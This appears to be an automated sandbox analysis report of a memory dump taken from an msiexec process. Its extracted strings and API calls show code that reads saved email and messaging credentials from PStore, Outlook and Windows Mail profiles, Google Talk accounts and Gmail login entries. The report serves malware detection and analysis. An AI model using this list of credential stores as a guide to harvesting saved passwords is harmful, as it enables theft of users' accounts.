                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                                                                                                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                                                                                                                      • API String ID: 745651260-375988210
                                                                                                                                                      • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                                                                                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                                                                                                                      • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                                                                                                                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                                                                                                                      Strings
                                                                                                                                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                                                                                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                                                                                                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                                                                                                                      • pstorec.dll, xrefs: 00403C30
                                                                                                                                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                                                                                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                                                                                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                                                                                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                                                                                                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                                                                                                                      • PStoreCreateInstance, xrefs: 00403C44
                                                                                                                                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                                                                                                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressFreeLoadProc_mbscpy
                                                                                                                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                                                                                                                      • API String ID: 1197458902-317895162
                                                                                                                                                      • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                                                                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                                                                                                                      • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                                                                                                                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 238 444c80-444c85 236->238 239 444c9f-444ca3 236->239 244 444d02-444d0d __setusermatherr 237->244 245 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->245 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 246 444c95-444c9d 241->246 247 444cad-444cb0 242->247 244->245 250 444da4-444da7 245->250 251 444d6a-444d72 245->251 246->247 247->237 254 444d81-444d85 250->254 255 444da9-444dad 250->255 252 444d74-444d76 251->252 253 444d78-444d7b 251->253 252->251 252->253 253->254 256 444d7d-444d7e 253->256 257 444d87-444d89 254->257 258 444d8b-444d9c GetStartupInfoA 254->258 255->250 256->254 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3662548030-0
                                                                                                                                                      • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                                                                      • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                                                                                                                      • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                                                                                                                      • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0044430B
                                                                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                                                                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                                                                                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                                                                                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                                                                                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                      • memset.MSVCRT ref: 00444379
                                                                                                                                                      • memset.MSVCRT ref: 00444394
                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                                                                                                                      • strlen.MSVCRT ref: 004443DB
                                                                                                                                                      • _strcmpi.MSVCRT ref: 00444401
                                                                                                                                                      Strings
                                                                                                                                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                                                                                                                      • Store Root, xrefs: 004443A5
                                                                                                                                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                                                                                                                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                                                                                                                      • API String ID: 3203569119-2578778931
                                                                                                                                                      • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                                                                      • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                                                                                                                      • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                                                                                                                      • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2054149589-0
                                                                                                                                                      • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                                                                      • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                                                                                                                      • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                                                                                                                      • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 321 40ba74 314->321 322 40ba6f-40ba72 314->322 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 321->323 322->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Cursor_mbsicmpqsort
                                                                                                                                                      • String ID: /nosort$/sort
                                                                                                                                                      • API String ID: 882979914-1578091866
                                                                                                                                                      • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                      • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                                                                                                                      • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                                                                                                                      • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 004109F7
                                                                                                                                                        • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                                                        • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                                                                      • memset.MSVCRT ref: 00410A32
                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3143880245-0
                                                                                                                                                      • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                      • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                                                                      • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                                                                                      • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                      • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                      • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                      • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                                                                      • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 380 410ddf-410de2 370->380 381 410dee-410df1 370->381 373 410e27-410e35 371->373 374 410e1d-410e20 371->374 375 410e45-410e4f call 410a9c 373->375 374->373 377 410e22-410e25 374->377 384 410e51-410e76 call 410d3d call 410add 375->384 385 410e7f-410e92 _mbscpy 375->385 377->373 378 410e37-410e40 377->378 378->375 380->371 383 410de4-410de7 380->383 387 410df8 381->387 383->371 386 410de9-410dec 383->386 384->385 389 410e95-410e97 385->389 386->371 386->381 387->389
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                                                                        • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                      • memset.MSVCRT ref: 00410E10
                                                                                                                                                      • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                      Strings
                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                      • API String ID: 119022999-2036018995
                                                                                                                                                      • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                                                                      • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                                                                      • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                                                                                      • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                                                                                                        • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                                                                                                        • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                        • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                        • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                                                                                                        • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                                                                                                                      • memset.MSVCRT ref: 00408620
                                                                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                      • memset.MSVCRT ref: 00408671
                                                                                                                                                      Strings
                                                                                                                                                      • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerEnumUser
                                                                                                                                                      • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                      • API String ID: 3996936265-1079885057
                                                                                                                                                      • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                                                                      • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                                                                                                                                                      • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                                                                                                                                                      • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 441 40ce70-40cea1 call 4023b2 call 401e69 446 40cea3-40cea6 441->446 447 40ceb8 441->447 448 40ceb2 446->448 449 40cea8-40ceb0 446->449 450 40cebd-40cecc _strcmpi 447->450 451 40ceb4-40ceb6 448->451 449->451 452 40ced3-40cedc call 40cdda 450->452 453 40cece-40ced1 450->453 451->450 454 40cede-40cef7 call 40c3d0 call 40ba28 452->454 458 40cf3f-40cf43 452->458 453->454 462 40cef9-40cefd 454->462 463 40cf0e 454->463 464 40cf0a-40cf0c 462->464 465 40ceff-40cf08 462->465 466 40cf13-40cf30 call 40affa 463->466 464->466 465->466 468 40cf35-40cf3a call 40c580 466->468 468->458
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                                                        • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: strlen$_strcmpimemset
                                                                                                                                                      • String ID: /stext
                                                                                                                                                      • API String ID: 520177685-3817206916
                                                                                                                                                      • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                      • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                                                                      • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                                                                                      • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$AddressFreeLoadProc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 145871493-0
                                                                                                                                                      • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                      • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                                                                      • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                                                                                      • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                                                                      APIs
                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                                                        • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                                                        • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                                                        • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4165544737-0
                                                                                                                                                      • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                      • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                                                                      • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                                                                      • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                                                                      APIs
                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                      • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                      • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                                                                      • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                                                                      • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                      • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                                                                      • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                                                                      • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                                                                      APIs
                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.2422939736.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                                                                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                                                                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
